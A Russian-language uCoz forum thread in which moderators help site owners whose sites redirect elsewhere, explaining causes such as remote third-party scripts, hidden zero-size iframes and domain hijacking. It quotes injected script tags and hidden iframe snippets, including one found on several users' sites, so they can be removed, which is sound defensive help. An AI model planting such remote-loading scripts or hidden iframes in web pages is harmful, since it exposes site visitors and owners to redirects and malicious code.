Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » При заходе на сайт перекидывает на другой
При заходе на сайт перекидывает на другой
Модератор форума
Сообщение # 1 | 22:42:16
Описание проблемы:

При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом


Причины возникновения:

1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки
Если вы ставите к себе на сайт скрипт подобного вида
Code
<script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script>

где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные
Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему //forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность

2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе
Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой
Code
<iframe src="http://levyisite.ru" width="1" height="1"></iframe>

Где levyisite.ru - это адрес чужого сайта
а
Code
width="1" height="1"
может иметь значения 0
Code
width="0" height="0"
что означает фоновую (скрытую)подгрузку, то это на 100% агрессивный вредоносный код
Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме //forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов

3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность

4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес


Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем
Fercho
Сообщений: 2
Репутация: 0

Сообщение # 496 | 22:28:48
Webanet большое вам спасибо я удалил и теперь все в порядке.
dmitry0784
Сообщений: 13
Репутация: 2

Сообщение # 497 | 11:50:21
На моих сайтах постоянно идет переброс на другие сайты ( на свои даже зайти не могу) - на описанные здесь скрипты проверил- ничего не нашелwww.iqif.ucoz.ruwww.gbi-bu-18.ucoz.ruwww.podarki-udm.ucoz.ru
сondor
Сообщений: 4661
Репутация: 1528

Сообщение # 498 | 12:01:55
dmitry0784, на сайте:

Цитата dmitry0784 ()
www.iqif.ucoz.ru


ищем и удаляем

Код
<script language="javascript" type="text/javascript" src="http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l"></script>


На сайте:

Цитата dmitry0784 ()
www.gbi-bu-18.ucoz.ru


ищем и удаляем

Код
<script language="javascript" type="text/javascript" src="http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l"></script>


На сайте:

Цитата dmitry0784 ()
www.podarki-udm.ucoz.ru


ищем и удаляем

Код
<script language="javascript" type="text/javascript" src="http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l"></script>


На всех сайтах один и тот же скрипт...

Можно через быструю замену: ТЫК
dmitry0784
Сообщений: 13
Репутация: 2

Сообщение # 499 | 13:29:47
Спасибо-помогло
dron4938
Сообщений: 4
Репутация: 0

Сообщение # 500 | 23:51:53
Помогите, сайт kapkanov.net перекидывает на http://ww2.kapkanov.net/?folio=7POYGN0G2 ,подскажите где копать
SOCHI1014
Сообщений: 863
Репутация: 229

Сообщение # 501 | 00:15:18
Цитата dron4938 ()
Помогите, сайт kapkanov.net перекидывает на http://ww2.kapkanov.net/?folio=7POYGN0G2 ,подскажите где копать
Удалить. <center><ilayersrc=http://www.astrolab.ru/cgi-bin/informer/informer.cgi?type=4frameborder=0 vspace=0 hspace=0 width=140 height=200 marginwidth=0marginheight=0 scrolling=no><iframesrc=http://www.astrolab.ru/cgi-bin/informer/informer.cgi?type=4frameborder=0 vspace=0 hspace=0 width=140 height=200 marginwidth=0 marginheight=0 scrolling=no></iframe></ilayer></center>
Сейчас еще покапаюсь:)

Добавлено (16 Окт 2013, 00:15:18)
---------------------------------------------
Вроде все


dron4938
Сообщений: 4
Репутация: 0

Сообщение # 502 | 00:28:18
Код
<center><ilayersrc=[url=http://u.to/X8zDBA]http://www.astrolab.ru/cgi-bin/informer/informer.cgi?type=4frameborder=0 vspace=0 hspace=0 width=140 height=200 marginwidth=0marginheight=0 scrolling=no><iframesrc=[url=http://u.to/X8zDBA]http://www.astrolab.ru/cgi-bin/informer/informer.cgi?type=4frameborder=0 vspace=0 hspace=0 width=140 height=200 marginwidth=0 marginheight=0 scrolling=no></iframe></ilayer></center>
удалил этот код, но не помогло, сайт по прежнему во всех браузерах перекидывает на http://ww2.kapkanov.net/?folio=7POYGN0G2
SOCHI1014
Сообщений: 863
Репутация: 229

Сообщение # 503 | 00:30:32
Цитата dron4938 ()
удалил этот код, но не помогло, сайт по прежнему во всех браузерах перекидывает на http://ww2.kapkanov.net/?folio=7POYGN0G2
Очистите кэш браузеров

webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 504 | 00:42:28
dron4938, а ну проверьте по картинке. нажмите на ссылку http://kapkanov.net/shapka/kapkanov.gif тут просто картинка с вашего сайта. без скриптов и прочей ерунды просто изображение. если перекинет даже через картинку, то разбирайтесь со своим доменом пожалуйста. там нечисто

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
dron4938
Сообщений: 4
Репутация: 0

Сообщение # 505 | 00:45:51
По картинке кидает на этот адрес http://mypageresults.com/?dn=kapkanov.net&flrdr=yes&nxte=gif
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 506 | 01:01:30
dron4938, чистим кеш в браузере и переходим по этой картинке http://kapkanov.net/images/patron.png
кеш чистят так //faq.ucoz.ru/faq/31-1
если после детальной очистки кеша перекинет опять по второй картинке то все же вам стоит разобраться с доменом

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
dron4938
Сообщений: 4
Репутация: 0

Сообщение # 507 | 01:21:19
Всё тоже самое , но если проблема в домене, то отключив домен сайт по стандартному адресу должен же работать. Как правильно от домена отключиться подскажите? (настройки - общие настройки - Автоматически перенаправлять со стандартного домена на прикрепленный: тут галочку если снять )

Добавлено (16 Окт 2013, 01:21:19)
---------------------------------------------
снял галочку, сайт открывается по стандартному домену ohotneg.moy.su, выходит действительно проблема в домене. Спасибо всем за помощь. Это мне регистратору доменов отписываться теперь?

webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 508 | 01:24:44
dron4938,
Цитата
Это мне регистратору доменов отписываться теперь?
да. если сайтик нормально работает во всех браузерах по стандартному домену, то вам разбираться с регистратором. проблема на 1000% в домене. там где-то рекламку подшили

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
$Vladimir$
Сообщений: 7465
Репутация: 1053

Сообщение # 509 | 08:55:19
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 510 | 11:38:30
Rоман, ваш запрос удален, так как сайт не находится в системе юкоз. а зараженный скрипт вот он http://agronova-altai.ru/files/show_ads.js удаляйте и далее знайте, что в этой теме обслуживаются сайты только системы юкоз

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » При заходе на сайт перекидывает на другой
Поиск: